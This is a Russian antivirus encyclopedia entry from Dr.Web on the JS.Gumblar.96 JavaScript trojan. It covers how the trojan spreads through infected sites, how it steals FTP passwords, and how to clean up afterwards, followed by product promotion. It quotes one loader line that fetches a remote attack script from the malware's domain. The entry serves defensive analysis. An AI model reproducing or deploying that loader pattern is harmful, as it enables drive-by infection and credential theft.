JS.Gumblar.96
(Trojan-Downloader.JS.Gumblar.a, Trojan.Script.65526, JS:Redirector-H7, Parser error, JS/Gumblar.B, Troj/JSRedir-R, Obfuscated Script.f, Trojan:JS/Gamburl.A )| Добавлен в вирусную базу Dr.Web: | 2009-07-07 |
| Описание добавлено: | 2009-07-14 |
Способ распространения
Вредоносный javascript JS.Gumblar.96, распространяется через зараженные веб-ресурсы. При посещении которых происходит определение типа веб-бразера и установленных плагинов, после чего осуществляется подгрузка javascript-сценария содержащего эксплойт или переадресация на злонамеренную веб-страницу.
Действия, совершаемые вирусом
JS.Gumblar.96 зашифрованный javascript-сценарий посредством которого в систему может быть установлен вредоносный исполняемый файл. Установленный в систему вирус влияет на результаты поиска в поисковой системе Google и похищает пароли от FTP-серверов для последующего их заражения.
В процессе посещения вредоносного веб-ресурса JS.Gumblar.96 осуществляет подгрузку javascript-сценария следующим образом:
document.write("src=//gumblar.cn/rss/?id=" + j + "")
После того, как вредоносный скрипт загружен происходит атака с использованием набора распространенных уязвимостей для установленного типа системы по полю User-Agent.
Рекомендации по лечению
- В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
- Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
- Если работа операционной системы заблокирована вредоносной программой семейства Trojan.Winlock, воспользуйтесь сервисом разблокировки компьютера. Если подобрать код разблокировки не удалось, действуйте согласно инструкции, представленной в п.2.
| Демо бесплатно | Скачать Dr.Web |
|---|---|
| На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление) | По серийному номеру |
Выполните полную проверку системы с использованием Антивируса Dr.Web Light для OS X. Данный продукт можно загрузить с официального сайта Apple App Store.
| Демо бесплатно | Скачать Dr.Web | Скачать Dr.Web с Apple Store |
|---|---|---|
| На 1 месяц (без регистрации) или 3 месяца ( с регистрацией и скидкой на продление) | По серийному номеру |
- На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.
| Демо бесплатно | Скачать Dr.Web |
|---|---|
| На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление) | По серийному номеру |
- Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
- Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
- загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
- после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
- выключите устройство и включите его в обычном режиме.
Демо бесплатно
На 14 дней
| Скачать с сайта | Скачать с Google Play | Скачать по QR-коду |
|---|
![[WebIQmeter]](http://st.drweb.com/static/new-www/social/webiq.png)
![[Google+]](http://st.drweb.com/static/new-www/social/google_plus.png)
![[Rutube]](http://st.drweb.com/static/new-www/social/rutube.png)
![[You Tube]](http://st.drweb.com/static/new-www/social/youtube.png)
![[Twitter]](http://st.drweb.com/static/new-www/social/twitter.png)
![[Facebook]](http://st.drweb.com/static/new-www/social/facebook.png)
![[Vkontakte]](http://st.drweb.com/static/new-www/social/vkontakte.png)
![[Одноклассники]](http://st.drweb.com/static/new-www/social/odnoklassniki.png)
![[Instagram]](http://st.drweb.com/static/new-www/social/instagram.png)
![[Pinterest]](http://st.drweb.com/static/new-www/social/pinterest.png)
